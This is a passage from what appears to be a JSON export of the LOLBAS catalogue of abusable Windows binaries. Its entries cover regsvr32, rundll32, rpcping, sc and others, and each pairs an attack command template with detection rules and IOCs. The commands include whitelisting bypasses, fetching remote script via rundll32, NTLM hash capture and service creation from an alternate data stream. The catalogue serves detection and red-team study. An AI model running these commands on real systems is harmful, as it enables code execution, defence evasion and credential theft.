04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_regsvr32_application_control_bypass.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"IOC","value":"regsvr32.exe retrieving files from Internet"},{"type":"IOC","value":"regsvr32.exe executing scriptlet (sct) files"},{"type":"IOC","value":"DotNet CLR libraries loaded into regsvr32.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - regsvr32.exe.log"}],"references":["https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md","https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/"]},{"id":"lolbas:regsvr32-exe:3","toolId":"lolbas:regsvr32-exe","toolName":"Regsvr32.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"regsvr32.exe /s /u /i:{PATH:.sct} scrobj.dll","description":"Execute the specified local .SCT script with scrobj.dll.","usecase":"Execute code from scriptlet, bypass Application whitelisting","mitre":["T1218.010"],"privilege":"user","fullPath":["C:\\Windows\\System32\\regsvr32.exe","C:\\Windows\\SysWOW64\\regsvr32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_regsvr32_application_control_bypass.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"IOC","value":"regsvr32.exe retrieving files from Internet"},{"type":"IOC","value":"regsvr32.exe executing scriptlet (sct) files"},{"type":"IOC","value":"DotNet CLR libraries loaded into regsvr32.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - regsvr32.exe.log"}],"references":["https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md","https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/"]},{"id":"lolbas:regsvr32-exe:4","toolId":"lolbas:regsvr32-exe","toolName":"Regsvr32.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"regsvr32.exe /s {PATH:.dll}","description":"Execute code in a DLL. The code must be inside the exported function `DllRegisterServer`.","usecase":"Execute DLL file","mitre":["T1218.010"],"privilege":"user","fullPath":["C:\\Windows\\System32\\regsvr32.exe","C:\\Windows\\SysWOW64\\regsvr32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_regsvr32_application_control_bypass.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"IOC","value":"regsvr32.exe retrieving files from Internet"},{"type":"IOC","value":"regsvr32.exe executing scriptlet (sct) files"},{"type":"IOC","value":"DotNet CLR libraries loaded into regsvr32.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - regsvr32.exe.log"}],"references":["https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md","https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/"]},{"id":"lolbas:regsvr32-exe:5","toolId":"lolbas:regsvr32-exe","toolName":"Regsvr32.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"regsvr32.exe /u /s {PATH:.dll}","description":"Execute code in a DLL. The code must be inside the exported function `DllUnRegisterServer`.","usecase":"Execute DLL file","mitre":["T1218.010"],"privilege":"user","fullPath":["C:\\Windows\\System32\\regsvr32.exe","C:\\Windows\\SysWOW64\\regsvr32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_regsvr32_application_control_bypass.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"IOC","value":"regsvr32.exe retrieving files from Internet"},{"type":"IOC","value":"regsvr32.exe executing scriptlet (sct) files"},{"type":"IOC","value":"DotNet CLR libraries loaded into regsvr32.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - regsvr32.exe.log"}],"references":["https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md","https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/"]},{"id":"lolbas:replace-exe:0","toolId":"lolbas:replace-exe","toolName":"Replace.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"replace.exe {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE:folder} /A","description":"Copy .cab file to destination","usecase":"Copy files","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\replace.exe","C:\\Windows\\SysWOW64\\replace.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"Replace.exe retrieving files from remote server"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml"}],"references":["https://twitter.com/elceef/status/986334113941655553","https://twitter.com/elceef/status/986842299861782529","https://lolbas-project.github.io/lolbas/Binaries/Replace/"]},{"id":"lolbas:replace-exe:1","toolId":"lolbas:replace-exe","toolName":"Replace.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"replace.exe {PATH_SMB:.exe} {PATH_ABSOLUTE:folder} /A","description":"Download/Copy executable to specified folder","usecase":"Download file","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\replace.exe","C:\\Windows\\SysWOW64\\replace.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"Replace.exe retrieving files from remote server"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml"}],"references":["https://twitter.com/elceef/status/986334113941655553","https://twitter.com/elceef/status/986842299861782529","https://lolbas-project.github.io/lolbas/Binaries/Replace/"]},{"id":"lolbas:reset-exe:0","toolId":"lolbas:reset-exe","toolName":"Reset.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"reset.exe session","description":"Once executed, `reset.exe` will execute `rwinsta.exe` in the same folder. Thus, if `reset.exe` is copied to a folder and an arbitrary executable is renamed to `rwinsta.exe`, `reset.exe` will spawn it.","usecase":"Execute an arbitrary executable via trusted system executable.","mitre":["T1218"],"privilege":"user","fullPath":["c:\\windows\\system32\\reset.exe","c:\\windows\\syswow64\\reset.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"reset.exe being executed and executes rwinsta.exe outside of its normal path of c:\\windows\\system32\\ or c:\\windows\\syswow64\\"}],"references":["https://lolbas-project.github.io/lolbas/Binaries/Reset/"]},{"id":"lolbas:rpcping-exe:0","toolId":"lolbas:rpcping-exe","toolName":"Rpcping.exe","name":"Credentials","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Credentials"],"command":"rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM","description":"Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.","usecase":"Capture credentials on a non-standard port","mitre":["T1003"],"privilege":"user","fullPath":["C:\\Windows\\System32\\rpcping.exe","C:\\Windows\\SysWOW64\\rpcping.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_rpcping_credential_capture.yml"}],"references":["https://github.com/vysec/RedTips","https://twitter.com/vysecurity/status/974806438316072960","https://twitter.com/vysecurity/status/873181705024266241","https://twitter.com/splinter_code/status/1421144623678988298","https://lolbas-project.github.io/lolbas/Binaries/Rpcping/"]},{"id":"lolbas:rpcping-exe:1","toolId":"lolbas:rpcping-exe","toolName":"Rpcping.exe","name":"Credentials","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Credentials"],"command":"rpcping /s 10.0.0.35 /e 9997 /a connect /u NTLM","description":"Trigger an authenticated RPC call to the target server (/s) that could be relayed to a privileged resource (Sign not Set).","usecase":"Relay a NTLM authentication over RPC (ncacn_ip_tcp) on a custom port","mitre":["T1187"],"privilege":"user","fullPath":["C:\\Windows\\System32\\rpcping.exe","C:\\Windows\\SysWOW64\\rpcping.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_rpcping_credential_capture.yml"}],"references":["https://github.com/vysec/RedTips","https://twitter.com/vysecurity/status/974806438316072960","https://twitter.com/vysecurity/status/873181705024266241","https://twitter.com/splinter_code/status/1421144623678988298","https://lolbas-project.github.io/lolbas/Binaries/Rpcping/"]},{"id":"lolbas:rundll32-exe:0","toolId":"lolbas:rundll32-exe","toolName":"Rundll32.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe {PATH},EntryPoint","description":"First part should be a DLL file (any extension accepted), EntryPoint should be the name of the entry point in the DLL file to execute.","usecase":"Execute DLL file","mitre":["T1218.011"],"privilege":"user","fullPath":["C:\\Windows\\System32\\rundll32.exe","C:\\Windows\\SysWOW64\\rundll32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml"},{"type":"IOC","value":"Outbount Internet/network connections made from rundll32"},{"type":"IOC","value":"Suspicious use of cmdline flags such as -sta"}],"references":["https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/","https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/","https://github.com/sailay1996/expl-bin/blob/master/obfus.md","https://github.com/sailay1996/misc-bin/blob/master/rundll32.md","https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90","https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code","https://lolbas-project.github.io/lolbas/Binaries/Rundll32/"]},{"id":"lolbas:rundll32-exe:1","toolId":"lolbas:rundll32-exe","toolName":"Rundll32.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe {PATH_SMB:.dll},EntryPoint","description":"Execute a DLL from an SMB share. EntryPoint is the name of the entry point in the DLL file to execute.","usecase":"Execute DLL from SMB share.","mitre":["T1218.011"],"privilege":"user","fullPath":["C:\\Windows\\System32\\rundll32.exe","C:\\Windows\\SysWOW64\\rundll32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml"},{"type":"IOC","value":"Outbount Internet/network connections made from rundll32"},{"type":"IOC","value":"Suspicious use of cmdline flags such as -sta"}],"references":["https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/","https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/","https://github.com/sailay1996/expl-bin/blob/master/obfus.md","https://github.com/sailay1996/misc-bin/blob/master/rundll32.md","https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90","https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code","https://lolbas-project.github.io/lolbas/Binaries/Rundll32/"]},{"id":"lolbas:rundll32-exe:2","toolId":"lolbas:rundll32-exe","toolName":"Rundll32.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:{REMOTEURL}\")","description":"Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.","usecase":"Execute code from Internet","mitre":["T1218.011"],"privilege":"user","fullPath":["C:\\Windows\\System32\\rundll32.exe","C:\\Windows\\SysWOW64\\rundll32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml"},{"type":"IOC","value":"Outbount Internet/network connections made from rundll32"},{"type":"IOC","value":"Suspicious use of cmdline flags such as -sta"}],"references":["https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/","https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/","https://github.com/sailay1996/expl-bin/blob/master/obfus.md","https://github.com/sailay1996/misc-bin/blob/master/rundll32.md","https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90","https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code","https://lolbas-project.github.io/lolbas/Binaries/Rundll32/"]},{"id":"lolbas:rundll32-exe:3","toolId":"lolbas:rundll32-exe","toolName":"Rundll32.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"rundll32 \"{PATH}:ADSDLL.dll\",DllMain","description":"Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).","usecase":"Execute code from alternate data stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\rundll32.exe","C:\\Windows\\SysWOW64\\rundll32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml"},{"type":"IOC","value":"Outbount Internet/network connections made from rundll32"},{"type":"IOC","value":"Suspicious use of cmdline flags such as -sta"}],"references":["https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/","https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/","https://github.com/sailay1996/expl-bin/blob/master/obfus.md","https://github.com/sailay1996/misc-bin/blob/master/rundll32.md","https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90","https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code","https://lolbas-project.github.io/lolbas/Binaries/Rundll32/"]},{"id":"lolbas:rundll32-exe:4","toolId":"lolbas:rundll32-exe","toolName":"Rundll32.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe -sta {CLSID}","description":"Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID.","usecase":"Execute a DLL/EXE COM server payload or ScriptletURL code.","mitre":["T1218.011"],"privilege":"user","fullPath":["C:\\Windows\\System32\\rundll32.exe","C:\\Windows\\SysWOW64\\rundll32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml"},{"type":"IOC","value":"Outbount Internet/network connections made from rundll32"},{"type":"IOC","value":"Suspicious use of cmdline flags such as -sta"}],"references":["https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/","https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/","https://github.com/sailay1996/expl-bin/blob/master/obfus.md","https://github.com/sailay1996/misc-bin/blob/master/rundll32.md","https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90","https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code","https://lolbas-project.github.io/lolbas/Binaries/Rundll32/"]},{"id":"lolbas:runexehelper-exe:0","toolId":"lolbas:runexehelper-exe","toolName":"Runexehelper.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"runexehelper.exe {PATH_ABSOLUTE:.exe}","description":"Launches the specified exe. Prerequisites: (1) diagtrack_action_output environment variable must be set to an existing, writable folder; (2) runexewithargs_output.txt file cannot exist in the folder indicated by the variable.","usecase":"Executes arbitrary code","mitre":["T1218"],"privilege":"user","fullPath":["c:\\windows\\system32\\runexehelper.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_runexehelper.yml"},{"type":"IOC","value":"c:\\windows\\system32\\runexehelper.exe is run"},{"type":"IOC","value":"Existence of runexewithargs_output.txt file"}],"references":["https://twitter.com/0gtweet/status/1206692239839289344","https://lolbas-project.github.io/lolbas/Binaries/Runexehelper/"]},{"id":"lolbas:runonce-exe:0","toolId":"lolbas:runonce-exe","toolName":"Runonce.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Runonce.exe /AlternateShellStartup","description":"Executes a Run Once Task that has been configured in the registry.","usecase":"Persistence, bypassing defensive counter measures","mitre":["T1218"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\runonce.exe","C:\\Windows\\SysWOW64\\runonce.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_runonce_execution.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/2926e98c5d998706ef7e248a63fb0367c841f685/rules/windows/persistence_run_key_and_startup_broad.toml"},{"type":"IOC","value":"Registy key add - HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\YOURKEY"}],"references":["https://twitter.com/pabraeken/status/990717080805789697","https://cmatskas.com/configure-a-runonce-task-on-windows/","https://lolbas-project.github.io/lolbas/Binaries/Runonce/"]},{"id":"lolbas:runscripthelper-exe:0","toolId":"lolbas:runscripthelper-exe","toolName":"Runscripthelper.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"runscripthelper.exe surfacecheck \\\\?\\{PATH_ABSOLUTE:.txt} {PATH_ABSOLUTE:folder}","description":"Execute the PowerShell script with .txt extension","usecase":"Bypass constrained language mode and execute Powershell script","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\WinSxS\\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\\Runscripthelper.exe","C:\\Windows\\WinSxS\\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\\Runscripthelper.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_runscripthelper.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Event ID 4104 - Microsoft-Windows-PowerShell/Operational"},{"type":"IOC","value":"Event ID 400 - Windows PowerShell"}],"references":["https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc","https://lolbas-project.github.io/lolbas/Binaries/Runscripthelper/"]},{"id":"lolbas:sc-exe:0","toolId":"lolbas:sc-exe","toolName":"Sc.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"sc create evilservice binPath=\"\\\"c:\\\\ADS\\\\file.txt:cmd.exe\\\" /c echo works > \\\"c:\\ADS\\works.txt\\\"\" DisplayName= \"evilservice\" start= auto\\ & sc start evilservice","description":"Creates a new service and executes the file stored in 